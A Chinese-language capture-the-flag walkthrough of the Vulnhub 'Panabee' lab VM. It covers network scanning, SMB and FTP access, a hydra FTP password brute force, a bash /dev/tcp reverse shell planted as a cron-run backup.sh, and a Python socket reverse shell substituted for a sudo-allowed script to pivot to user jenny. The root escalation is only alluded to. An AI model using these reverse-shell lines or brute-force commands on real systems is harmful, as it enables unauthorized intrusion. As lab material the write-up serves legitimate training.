Vulnhub之Panabee靶机详细测试过程

Panabee

识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:cd:98:c4      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.228  08:00:27:2b:99:a3      1      60  PCS Systemtechnik GmbH                                                   


利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.228

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-22 23:21 EDT
Nmap scan report for bogon (192.168.56.228)
Host is up (0.00011s latency).
Not shown: 65529 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 dc:e1:e6:86:ba:cd:4c:1c:e8:92:c4:02:90:64:d8:ba (RSA)
|   256 00:72:c6:61:0e:34:1b:1a:b4:6c:f8:fc:b3:25:7b:6c (ECDSA)
|_  256 16:24:5b:97:20:ad:7d:ec:c4:fc:19:a5:3d:3c:cc:13 (ED25519)
25/tcp  open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=panabee
| Subject Alternative Name: DNS:panabee
| Not valid before: 2020-06-14T18:25:48
|_Not valid after:  2030-06-12T18:25:48
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: panabee, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:2B:99:A3 (Oracle VirtualBox virtual NIC)
Service Info: Host:  panabee; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 7h59m58s
|_nbstat: NetBIOS name: PANABEE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2023-03-23T11:21:52
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.16 seconds
                                                                 

获得Shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ smbclient //192.168.56.228/note      
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jun 14 23:08:42 2020
  ..                                  D        0  Mon Jun 15 04:59:44 2020
  note.txt                            N      265  Sun Jun 14 23:08:42 2020

                20508240 blocks of size 1024. 12823536 blocks available
smb: \> get note.txt 
getting file \note.txt of size 265 as note.txt (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
smb: \> put test.txt 
putting file test.txt as \test.txt (2.3 kb/s) (average 2.3 kb/s)
smb: \> ls -alh
NT_STATUS_NO_SUCH_FILE listing \-alh
smb: \> ls
  .                                   D        0  Thu Mar 23 07:23:20 2023
  ..                                  D        0  Mon Jun 15 04:59:44 2020
  test.txt                            A       12  Thu Mar 23 07:23:20 2023
  note.txt                            N      265  Sun Jun 14 23:08:42 2020

                20508240 blocks of size 1024. 12823528 blocks available

可以通过SMB上传文件

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat note.txt       
Dear goper, 

I'll just leave it here as a note,

Sorry for the late response,
The server will now `backup` you files in your home dir,
go ahead and backup anything you like, server will do it for you.

Please delete this note once you've read for security measure

  1. goper是用户名?

  2. 有计划任务在执行?(定期备份文件)

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ nikto -h http://192.168.56.228
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.228
+ Target Hostname:    192.168.56.228
+ Target Port:        80
+ Start Time:         2023-03-22 23:25:23 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a81bc478475f, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ 7915 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2023-03-22 23:25:52 (GMT-4) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.41) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

目录扫描没有什么收获,接下来用hydra来破解密码

──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ hydra -l goper -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.228         
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-22 23:38:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.228:21/
[21][ftp] host: 192.168.56.228   login: goper   password: spiderman
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-22 23:39:08

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ftp 192.168.56.228        
Connected to 192.168.56.228.
220 (vsFTPd 3.0.3)
Name (192.168.56.228:kali): goper
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||8003|)
150 Here comes the directory listing.
drwxrwxr-x    4 1000     118          4096 Jun 21  2020 .
drwxrwxr-x    4 1000     118          4096 Jun 21  2020 ..
-rw-------    1 1000     1000         4591 Jun 21  2020 .bash_history
-rw-r--r--    1 1000     1000          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 1000     1000         3771 Feb 25  2020 .bashrc
drwx------    2 1000     1000         4096 Jun 14  2020 .cache
drwxrwxr-x    3 1000     1000         4096 Jun 15  2020 .local
-rw-r--r--    1 1000     1000          807 Feb 25  2020 .profile
-rw-rw-r--    1 1000     1000           66 Jun 15  2020 .selected_editor
-rw-r--r--    1 1000     1000            0 Jun 14  2020 .sudo_as_admin_successful
-rw-------    1 1000     1000        11134 Jun 15  2020 .viminfo
-rw-r--r--    1 0        1000          332 Jun 15  2020 status.py
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get status.py
local: status.py remote: status.py
229 Entering Extended Passive Mode (|||59411|)
150 Opening BINARY mode data connection for status.py (332 bytes).
100% |*********************************************************************************|   332        2.25 KiB/s    00:00 ETA
226 Transfer complete.
332 bytes received in 00:00 (2.23 KiB/s)
ftp> put test.txt 
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||13323|)
150 Ok to send data.
100% |*********************************************************************************|    12      221.10 KiB/s    00:00 ETA
226 Transfer complete.
12 bytes sent in 00:00 (8.87 KiB/s)
ftp> 

似乎在goper的家目录,因此可以将ssh公钥上传到目标主机

──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ssh-keygen              
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): goper
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in goper
Your public key has been saved in goper.pub
The key fingerprint is:
SHA256:3+QFgFMWB+8pvT4RzyAYwi8m6G0MyrXVJolWXxFpj4c kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|     .   =Xo.    |
|     .o += +     |
|   .o +oo++ o    |
|  o+.+o+oE.=oo   |
|.oo+ooo.S o.==.  |
|....+    . =.oo  |
|   .      . +.   |
|           ..    |
|            ..   |
+----[SHA256]-----+
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ls     
goper  goper.pub  nmap_full_scan  note.txt  status.py  test.txt

ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys 
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||34675|)
150 Ok to send data.
100% |*********************************************************************************|   563       16.77 MiB/s    00:00 ETA
226 Transfer complete.
563 bytes sent in 00:00 (0.98 MiB/s)
ftp> 

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ssh -i goper goper@192.168.56.228          
The authenticity of host '192.168.56.228 (192.168.56.228)' can't be established.
ED25519 key fingerprint is SHA256:pA08zKKK15biAZhw/s1p7SqYmXtikdcPqTiWNiYSLwk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.228' (ED25519) to the list of known hosts.
goper@192.168.56.228: Permission denied (publickey).
                                                                           

但是目标并不允许基于私钥登录,这条路行不通

写一个bash脚本上传到ftp也就是goper的家目录,看能不能被自动执行

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat shell.sh 
bash -i >& /dev/tcp/192.168.56.146/5555 0>&1

这个bash脚本名称应该是backup.sh,才回cron执行

ftp> put backup.sh 
local: backup.sh remote: backup.sh
229 Entering Extended Passive Mode (|||10215|)
150 Ok to send data.
100% |*********************************************************************************|    57      869.75 KiB/s    00:00 ETA
226 Transfer complete.
57 bytes sent in 00:00 (45.43 KiB/s)

─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 45726
bash: cannot set terminal process group (3520): Inappropriate ioctl for device
bash: no job control in this shell
goper@panabee:~$ pwd
pwd
/home/goper
goper@panabee:~$ ls -alh
ls -alh
total 72K
drwxrwxr-x 5 goper ftp   4.0K Mar 23 11:57 .
drwxr-xr-x 4 root  root  4.0K Jun 15  2020 ..
-rwx--x--x 1 goper goper   57 Mar 23 11:57 backup.sh
-rw------- 1 goper goper 4.5K Jun 21  2020 .bash_history
-rw-r--r-- 1 goper goper  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 goper goper 3.7K Feb 25  2020 .bashrc
drwx------ 2 goper goper 4.0K Jun 14  2020 .cache
drwxrwxr-x 3 goper goper 4.0K Jun 15  2020 .local
-rw-r--r-- 1 goper goper  807 Feb 25  2020 .profile
-rw-rw-r-- 1 goper goper   66 Jun 15  2020 .selected_editor
-rw------- 1 goper goper   57 Mar 23 11:54 shell.sh
drwx------ 2 goper goper 4.0K Mar 23 11:43 .ssh
-rw-r--r-- 1 root  goper  332 Jun 15  2020 status.py
-rw-r--r-- 1 goper goper    0 Jun 14  2020 .sudo_as_admin_successful
-rw------- 1 goper goper   12 Mar 23 11:40 test.txt
-rw------- 1 goper goper  11K Jun 15  2020 .viminfo
goper@panabee:~$ sudo -l
sudo -l
Matching Defaults entries for goper on panabee:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goper may run the following commands on panabee:
    (jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py

可以将原有的status.py删除,然后通过FTP上传反弹shell的python脚本,从而得到jenny的shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ vim status.py        
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat status.py
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

goper@panabee:~$ rm -rf status.py
rm -rf status.py

ftp> put status.py
local: status.py remote: status.py
229 Entering Extended Passive Mode (|||26655|)
150 Ok to send data.
100% |*********************************************************************************|   232        3.35 MiB/s    00:00 ETA
226 Transfer complete.
232 bytes sent in 00:00 (167.32 KiB/s)
ftp> 

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat status.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
                                                                                                
goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
sudo -u jenny /usr/bin/python3 /home/goper/status.py
/usr/bin/python3: can't open file '/home/goper/status.py': [Errno 13] Permission denied
goper@panabee:~$ chmod 777 status.py
chmod 777 status.py
goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
sudo -u jenny /usr/bin/python3 /home/goper/status.py

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 59108
$ id
uid=1001(jenny) gid=1001(jenny) groups=1001(jenny)
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
jenny@panabee:/home/goper$ cd /home
cd /home
jenny@panabee:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root  root  4.0K Jun 15  2020 .
drwxr-xr-x 20 root  root  4.0K Jun 15  2020 ..
drwxrwxr-x  5 goper ftp   4.0K Mar 23 12:08 goper
drwx------  3 jenny jenny 4.0K Jun 15  2020 jenny
jenny@panabee:/home$ cd jenny
cd jenny
jenny@panabee:~$ ls -alh
ls -alh
total 40K
drwx------ 3 jenny jenny 4.0K Jun 15  2020 .
drwxr-xr-x 4 root  root  4.0K Jun 15  2020 ..
-rw------- 1 jenny jenny 2.0K Jun 30  2020 .bash_history
-rw-r--r-- 1 jenny jenny  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 jenny jenny 3.7K Feb 25  2020 .bashrc
-rw------- 1 jenny jenny   32 Jun 15  2020 .lesshst
-rw-r--r-- 1 jenny jenny  807 Feb 25  2020 .profile
-rw-rw-r-- 1 jenny jenny   13 Jun 15  2020 status.txt
-rw-r--r-- 1 root  root   213 Jun 15  2020 thanks_jenny
drwxrwxr-x 2 root  jenny 4.0K Jun 30  2020 .tmux-0

从.bash_history知道有个secret.zip文件,将其下载到Kali Linux本地

但是破解失败,本靶机的提权需要利用.tmux进行


提权

cd /root
# ls -alh
ls -alh
total 80K
drwx------  5 root root 4.0K Jun 30  2020 .
drwxr-xr-x 20 root root 4.0K Jun 15  2020 ..
-rw-------  1 root root  18K Jun 30  2020 .bash_history
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
drwx------  2 root root 4.0K Jun 14  2020 .cache
-rw-------  1 root root   38 Jun 30  2020 .lesshst
drwxr-xr-x  3 root root 4.0K Jun 14  2020 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root  239 Jun 15  2020 proof.txt
-rw-r--r--  1 root root   66 Jun 15  2020 .selected_editor
drwx------  2 root root 4.0K Jun 14  2020 .ssh
-rw-------  1 root root  13K Jun 21  2020 .viminfo
 __                  __   ___  ___    
|__)  /\  |\ |  /\  |__) |__  |__     
|    /~~\ | \| /~~\ |__) |___ |___    
                                      

热门相关:最强狂兵   第一神算:纨绔大小姐   寂静王冠   别那么骄傲   女白领升值技巧